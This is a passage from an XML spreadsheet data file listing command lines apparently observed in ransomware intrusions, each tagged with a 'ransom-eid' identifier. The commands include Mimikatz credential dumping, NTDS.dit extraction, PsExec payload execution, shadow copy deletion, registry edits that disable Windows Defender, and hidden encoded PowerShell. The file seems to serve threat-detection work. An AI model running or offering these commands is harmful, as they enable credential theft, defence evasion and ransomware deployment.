    <m/>
    <m/>
    <x v="24"/>
  </r>
  <r>
    <s v="ransom-eid0780"/>
    <s v="pshell-pid"/>
    <m/>
    <s v="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -e &lt;encoded string&gt;"/>
    <m/>
    <m/>
    <s v="mshta.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="27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27"/>
  </r>
  <r>
    <s v="ransom-eid0459"/>
    <m/>
    <m/>
    <s v="https://github.com/rsmudge/ZeroLogon-BOF"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="24"/>
  </r>
  <r>
    <s v="ransom-eid0460"/>
    <m/>
    <m/>
    <s v="dcsync domain.local"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="24"/>
  </r>
  <r>
    <s v="ransom-eid0461"/>
    <m/>
    <s v="cobalt strike shell = cmd.exe /c"/>
    <s v="shell AGENT_INSTALLER.msi"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="24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24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24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24"/>
  </r>
  <r>
    <s v="ransom-eid0467"/>
    <m/>
    <m/>
    <s v="Esentutl /p C:\log\ntds.dit"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="24"/>
  </r>
  <r>
    <s v="ransom-eid0468"/>
    <m/>
    <m/>
    <s v="C:\programdata\netscan"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="24"/>
  </r>
  <r>
    <s v="ransom-eid0469"/>
    <m/>
    <s v="cobalt strike shell = cmd.exe /c"/>
    <s v="shell netscan.exe /hide /auto:&quot;resuult.xml&quot; /config:netscan.xml /file:range.txt"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="24"/>
  </r>
  <r>
    <s v="ransom-eid0472"/>
    <m/>
    <m/>
    <s v="execute-assembly /home/user/soft/scripts/SharpView.exe Find- DomainUserLocation -UserIdentity gpetit"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="24"/>
  </r>
  <r>
    <s v="ransom-eid0473"/>
    <m/>
    <m/>
    <s v="execute-assembly C:\Users\Андрей\Soft\Hacking\SharpView.exe Find-DomainUserLocation -UserIdentity gpetit"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="24"/>
  </r>
  <r>
    <s v="ransom-eid0475"/>
    <m/>
    <s v="cobalt strike shell = cmd.exe /c"/>
    <s v="shell dir \\172.16.1.40\c$"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="24"/>
  </r>
  <r>
    <s v="ransom-eid0476"/>
    <m/>
    <m/>
    <s v="\\172.16.1.40\c$\Users\gpetit\AppData\Local\Filezilla_x000a_\\172.16.1.40\c$\Users\gpetit\AppData\Roaming\Filezilla"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="24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24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24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24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24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24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24"/>
  </r>
  <r>
    <s v="ransom-eid0483"/>
    <m/>
    <m/>
    <s v="start PsExec.exe -d @C:\share$\comps1.txt -u DOMAIN\ADMINISTRATOR -p PASSWORD cmd /c c:\windows\temp\fx166.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="24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24"/>
  </r>
  <r>
    <s v="ransom-eid0814"/>
    <s v="pshell-pid"/>
    <m/>
    <s v="powershell -exec bypass -enc &lt;base64 encrypted command string&gt;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="28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24"/>
  </r>
  <r>
    <s v="ransom-eid0487"/>
    <m/>
    <m/>
    <s v="sekurlsa::logonpasswords"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="24"/>
  </r>
  <r>
    <s v="ransom-eid0488"/>
    <m/>
    <m/>
    <s v="token::elevate"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="24"/>
  </r>
  <r>
    <s v="ransom-eid0489"/>
    <m/>
    <m/>
    <s v="lsadump::sam"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="24"/>
  </r>
  <r>
    <s v="ransom-eid0490"/>
    <m/>
    <m/>
    <s v="reg add &quot;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server&quot; /v fAllowToGetHelp /t REG_DWORD /d 1 /f"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="24"/>
  </r>
  <r>
    <s v="ransom-eid0491"/>
    <m/>
    <m/>
    <s v="C:\Windows\system32\svchost.exe -k UnistackSvcGroup"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="25"/>
  </r>
  <r>
    <s v="ransom-eid0492"/>
    <m/>
    <m/>
    <s v="taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="25"/>
  </r>
  <r>
    <s v="ransom-eid0493"/>
    <m/>
    <m/>
    <s v="C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s WpnUserService"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="25"/>
  </r>
  <r>
    <s v="ransom-eid0494"/>
    <m/>
    <m/>
    <s v="rundll32.exe C:\Users\USER\AppData\Local\Temp\7A86.dll,DllRegisterServer"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="25"/>
  </r>
  <r>
    <s v="ransom-eid0495"/>
    <m/>
    <m/>
    <s v="C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="25"/>
  </r>
  <r>
    <s v="ransom-eid0499"/>
    <m/>
    <m/>
    <s v="C:\Windows\system32\net1 group &quot;domain admins&quot; /dom"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="25"/>
  </r>
  <r>
    <s v="ransom-eid0500"/>
    <m/>
    <m/>
    <s v="C:\Windows\system32\cmd.exe /C systeminfo"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="25"/>
  </r>
  <r>
    <s v="ransom-eid0501"/>
    <m/>
    <m/>
    <s v="C:\Windows\system32\cmd.exe /C ping DOMAINCONTROLLER"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="25"/>
  </r>
  <r>
    <s v="ransom-eid0502"/>
    <m/>
    <m/>
    <s v="C:\Windows\system32\cmd.exe /C ping ENDPOINT"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="25"/>
  </r>
  <r>
    <s v="ransom-eid0504"/>
    <m/>
    <m/>
    <s v="C:\Windows\System32\Taskmgr.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="25"/>
  </r>
  <r>
    <s v="ransom-eid0505"/>
    <m/>
    <m/>
    <s v="C:\Windows\system32\cmd.exe /C time"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="25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25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8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25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8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25"/>
  </r>
  <r>
    <s v="ransom-eid0511"/>
    <s v="wmic-pid "/>
    <m/>
    <s v="C:\Windows\system32\cmd.exe /C wmic /node:&quot;DOMAINCONTROLLER&quot; process call create &quot;C:\3.exe&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="25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25"/>
  </r>
  <r>
    <s v="ransom-eid0513"/>
    <s v="wmic-pid "/>
    <m/>
    <s v="C:\Windows\system32\cmd.exe /C wmic /node:&quot;ENDPOINT&quot; process call create &quot;C:\test.exe&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="25"/>
  </r>
  <r>
    <s v="ransom-eid0514"/>
    <m/>
    <m/>
    <s v="rundll32.exe C:\Users\USER\AppData\Local\Temp\randomstring.dll,#1"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <s v="ransom-eid0515"/>
    <m/>
    <m/>
    <s v="C:\Windows\system32\svchost.exe -k UnistackSvcGroup"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <s v="ransom-eid0519"/>
    <m/>
    <m/>
    <s v="ntdsutil &quot;ac in ntds&quot; &quot;ifm&quot; &quot;create full c:\windows\temp\crashpad\x&quot; q q"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <s v="ransom-eid0520"/>
    <m/>
    <m/>
    <s v="ntdsAudit.exe ntds.dit -s SYSTEM -p pwddump.txt -u users.csv"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <s v="ransom-eid0526"/>
    <m/>
    <m/>
    <s v="ipconfig /all"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <s v="ransom-eid0529"/>
    <m/>
    <m/>
    <s v="tasklist"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <s v="ransom-eid0532"/>
    <m/>
    <m/>
    <s v="SYSTEMINFO"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <s v="ransom-eid0541"/>
    <m/>
    <m/>
    <s v="netstat -ano"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <s v="ransom-eid0543"/>
    <m/>
    <m/>
    <s v="arp -a "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <s v="ransom-eid0544"/>
    <m/>
    <m/>
    <s v="ping -n 1 hostname &gt;&gt; C:\programdata\log.txt"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <s v="ransom-eid0545"/>
    <m/>
    <m/>
    <s v="Invoke-ShareFinder -CheckShareAccess -Verbose | Out-File -Encoding ascii C:\ProgramData\shares.txt"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <s v="ransom-eid0546"/>
    <m/>
    <m/>
    <s v="Get-NetDomain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <s v="ransom-eid0547"/>
    <m/>
    <m/>
    <s v="Get-NetCurrentUser"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <s v="ransom-eid0548"/>
    <m/>
    <m/>
    <s v="Get-ADDomainController"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <s v="ransom-eid0549"/>
    <m/>
    <m/>
    <s v="Get-ADDomainController -Filter * | ft"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <s v="ransom-eid0550"/>
    <m/>
    <m/>
    <s v="Get-ADComputer -Filter * -Properties * | Get-Member"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <s v="ransom-eid0551"/>
    <m/>
    <m/>
    <s v="Get-ADDomain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <s v="ransom-eid0552"/>
    <m/>
    <m/>
    <s v="dir &quot;\\hostname\c$\Program Files\* &gt;&gt; C:\programdata\AV.txt"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="5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5"/>
  </r>
  <r>
    <s v="ransom-eid0554"/>
    <m/>
    <m/>
    <s v="cmd.exe /c ipconfig"/>
    <s v="rundll32.exe c:\users\&lt;&gt;\appdata\local\temp\37b.dll, entrypoint"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <s v="ransom-eid0555"/>
    <m/>
    <m/>
    <s v="cmd.exe /c ipconfig /all"/>
    <s v="rundll32.exe c:\users\&lt;&gt;\appdata\local\temp\37b.dll, entrypoint"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <s v="ransom-eid0556"/>
    <m/>
    <m/>
    <s v="cmd.exe /c ping"/>
    <s v="rundll32.exe c:\users\&lt;&gt;\appdata\local\temp\37b.dll, entrypoint"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <s v="ransom-eid0559"/>
    <m/>
    <m/>
    <s v="cmd.exe /c tasklist"/>
    <s v="rundll32.exe c:\users\&lt;&gt;\appdata\local\temp\37b.dll, entrypoint"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <s v="ransom-eid0561"/>
    <m/>
    <m/>
    <s v="cmd.exe /c systeminfo"/>
    <s v="rundll32.exe c:\users\&lt;&gt;\appdata\local\temp\37b.dll, entrypoint"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <s v="ransom-eid0563"/>
    <m/>
    <m/>
    <s v="svchost.exe -k UnistackSvcGroup"/>
    <s v="rundll32.exe C:\Users\&lt;&gt;\AppData\Local\Temp\randomstring.dll,EntryPoint"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="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6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6"/>
  </r>
  <r>
    <s v="ransom-eid0578"/>
    <m/>
    <m/>
    <s v="&quot;C:\Windows\system32\net1 stop &quot;&quot;samss&quot;&quot; /y&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="ransom-eid0579"/>
    <m/>
    <m/>
    <s v="&quot;C:\Windows\system32\net1 stop &quot;&quot;veeamcatalogsvc&quot;&quot; /y&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="ransom-eid0580"/>
    <m/>
    <m/>
    <s v="&quot;C:\Windows\system32\net1 stop &quot;&quot;veeamcloudsvc&quot;&quot; /y&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="ransom-eid0581"/>
    <m/>
    <m/>
    <s v="&quot;C:\Windows\system32\net1 stop &quot;&quot;veeamdeploysvc&quot;&quot; /y&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="ransom-eid0582"/>
    <m/>
    <m/>
    <s v="&quot;C:\Windows\system32\taskmgr.exe&quot;&quot; /4&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="ransom-eid0583"/>
    <m/>
    <m/>
    <s v="&quot;C:\Windows\system32\wbem\wmiprvse.exe -Embedding&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="ransom-eid0584"/>
    <m/>
    <m/>
    <s v="&quot;C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="6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6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6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6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6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6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6"/>
  </r>
  <r>
    <s v="ransom-eid0591"/>
    <m/>
    <m/>
    <s v="ipconfig /all"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <s v="ransom-eid0592"/>
    <m/>
    <m/>
    <s v="systeminfo"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <s v="ransom-eid0593"/>
    <s v="wmic-pid "/>
    <m/>
    <s v="WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <s v="ransom-eid0603"/>
    <m/>
    <m/>
    <s v="cmd.exe /c chcp &gt;&amp;2"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <s v="ransom-eid0610"/>
    <m/>
    <m/>
    <s v="Invoke-ShareFinder"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <s v="ransom-eid0611"/>
    <m/>
    <m/>
    <s v="cmd /c ping \\redacted\"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <s v="ransom-eid0612"/>
    <m/>
    <m/>
    <s v="conhost.exe 0xffffffff - ForceV1"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <s v="ransom-eid0613"/>
    <m/>
    <m/>
    <s v="C:\Windows\system32\cmd.exe /C dir “\\&lt;REDACTED&gt;\C$” /s &gt;&gt; listback.txt"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <s v="ransom-eid0614"/>
    <m/>
    <m/>
    <s v="C:\Windows\system32\cmd.exe /C dir “\\&lt;REDACTED&gt;\C$” /s &gt;&gt; list1.txt"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <s v="ransom-eid0615"/>
    <m/>
    <m/>
    <s v="regsvr32.exe /s /n /i:&quot;-m -net -size 10 -nomutex -p \\host\C$&quot; x64.dll"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <s v="ransom-eid0616"/>
    <m/>
    <m/>
    <s v="rundll32.exe \\host\c$\ProgramData\c64.dll, StartA"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <s v="ransom-eid0617"/>
    <m/>
    <m/>
    <s v="c:\windows\system32\msiexec.exe /I C:\programdata\sql.msi"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7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19"/>
  </r>
  <r>
    <s v="ransom-eid0619"/>
    <m/>
    <m/>
    <s v="cmd /c dir &quot;\\host\c$&quot; /s&gt;&gt; listback.txt"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <s v="ransom-eid0620"/>
    <m/>
    <m/>
    <s v="regsvr32.exe /s c:\users\&lt;uname&gt;\AppData\Local\Temp\Ewge.dll"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <s v="ransom-eid0621"/>
    <m/>
    <m/>
    <s v="&quot;msiexec.exe /V&quot;"/>
    <s v="&quot;AleterAgent.exe&quot; /u "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7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19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19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19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9"/>
  </r>
  <r>
    <s v="ransom-eid0953"/>
    <s v="pshell-pid"/>
    <m/>
    <s v="powershell -nop -w hidden -encodedcommand &lt;encoded cmd&gt;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="34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18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18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18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18"/>
  </r>
  <r>
    <s v="ransom-eid1121"/>
    <s v="pshell-pid"/>
    <m/>
    <s v="powershell.exe -nop -w -hidden -e &lt;encoded cmd&gt;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="18"/>
  </r>
  <r>
    <s v="ransom-eid0634"/>
    <m/>
    <m/>
    <s v="schtasks /create /sc minute /mo 1 /tn Server /tr $user\$temp/Server.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26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26"/>
  </r>
  <r>
    <s v="ransom-eid0639"/>
    <m/>
    <m/>
    <s v="Bitsadmin /transfer debjob /download \\[localuser]\C$\Windows\[Conti].dll C:\Windows\[conti].dll"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0640"/>
    <m/>
    <m/>
    <s v="bitsadmin /transfer xxx \\&lt;xxx&gt;\share$\xxx.exe %APPDATA%\xxx.exe &amp; %APPDATA%\xxx.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0641"/>
    <m/>
    <m/>
    <s v="reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG _ DWORD /d 1 /f"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0642"/>
    <m/>
    <m/>
    <s v="$windir\regedit.exe -single 1df11bc19aa52b623bdf15380e3fded56d8eb6fb7b53a2240779864b1a6474ad"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0643"/>
    <m/>
    <m/>
    <s v="netsh advfirewall firewall set rule group=”Remote Desktop” new enable=yes"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0644"/>
    <m/>
    <m/>
    <s v="netsh advfirewall firewall set rule File and Printer Sharing new enable=Yes "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0645"/>
    <m/>
    <m/>
    <s v="netsh firewall add allowedprogram “$user\$temp\svchos23.exe” “svchos23.exe” ENABLE"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0646"/>
    <m/>
    <m/>
    <s v="netsh firewall add allowedprogram “$user\$temp\cheats.exe” “cheats.exe” ENABLE"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0647"/>
    <m/>
    <m/>
    <s v="netsh firewall add allowedprogram “$user\$temp\IXP000.TMP\crypted.exe” “crypted.exe” ENABLE"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0648"/>
    <m/>
    <m/>
    <s v="taskill.exe /F /IM Raccine.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0649"/>
    <m/>
    <m/>
    <s v="taskill.exe /F /IM RaccineSettings.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0650"/>
    <m/>
    <m/>
    <s v="$windir\$system32\schtasks.exe /DELETE /TN “Raccine Rules Updater” /F "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0651"/>
    <m/>
    <m/>
    <s v="Get-WmiObject Win32 _ Shadowcopy |ForEach-Object {$ _ .Delete();}"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0652"/>
    <m/>
    <m/>
    <s v="reg.exe add “HKLM\System\CurrentControlSet\Services\SecurityHealthService” /v “Start” /t REG _ DWORD /d “4” /f"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0653"/>
    <m/>
    <m/>
    <s v="reg.exe delete “HKLM\Software\Policies\Microsoft\Windows Defender” /f"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0654"/>
    <m/>
    <m/>
    <s v="reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender” /v “DisableAntiSpyware” /t REG _ DWORD /d “1” /f"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0655"/>
    <m/>
    <m/>
    <s v="reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender” /v “DisableAntiVirus” /t REG _ DWORD /d “1” /f"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0656"/>
    <m/>
    <m/>
    <s v="reg.exe add HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine” /v “MpEnablePus” /t REG _ DWORD /d “0” /f"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26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26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26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26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26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26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26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26"/>
  </r>
  <r>
    <s v="ransom-eid0664"/>
    <m/>
    <m/>
    <s v="reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet” /v “SpynetReporting” /t REG _ DWORD /d “0” /f"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0665"/>
    <m/>
    <m/>
    <s v="netsh advfirewall firewall set rule Network Discovery new enable=Yes"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26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26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26"/>
  </r>
  <r>
    <s v="ransom-eid0669"/>
    <m/>
    <m/>
    <s v="reg.exe add “HKLM\System\CurrentControlSet\Services\WdBoot” /v “Start” /t REG _DWORD /d “4” /f"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0670"/>
    <m/>
    <m/>
    <s v="reg.exe add “HKLM\System\CurrentControlSet\Services\WdFilter” /v “Start” /t REG _DWORD /d “4” /f"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0671"/>
    <m/>
    <m/>
    <s v="reg.exe add “HKLM\System\CurrentControlSet\Services\WdNisDrv” /v “Start” /t REG _ DWORD /d “4” /f"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0672"/>
    <m/>
    <m/>
    <s v="reg.exe add “HKLM\System\CurrentControlSet\Services\WdNisDrv” /v “Start” /t REG _ DWORD /d “4” /f"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0673"/>
    <m/>
    <m/>
    <s v="reg.exe add “HKLM\System\CurrentControlSet\Services\WdNisSvc” /v “Start” /t REG _ DWORD /d “4” /f"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0674"/>
    <m/>
    <m/>
    <s v="reg.exe add “HKLM\System\CurrentControlSet\Services\WinDefend” /v “Start” /t REG _ DWORD /d “4” /f"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0675"/>
    <m/>
    <m/>
    <s v="reg.exe add “HKLM\System\CurrentControlSet\Services\SecurityHealthService” /v “Start” /t REG _ DWORD /d “4” /f"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26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26"/>
  </r>
  <r>
    <s v="ransom-eid0677"/>
    <m/>
    <m/>
    <s v="reg.exe delete “HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run” /v “Windows Defender” /f"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="26"/>
  </r>
  <r>
    <s v="ransom-eid0678"/>
    <m/>
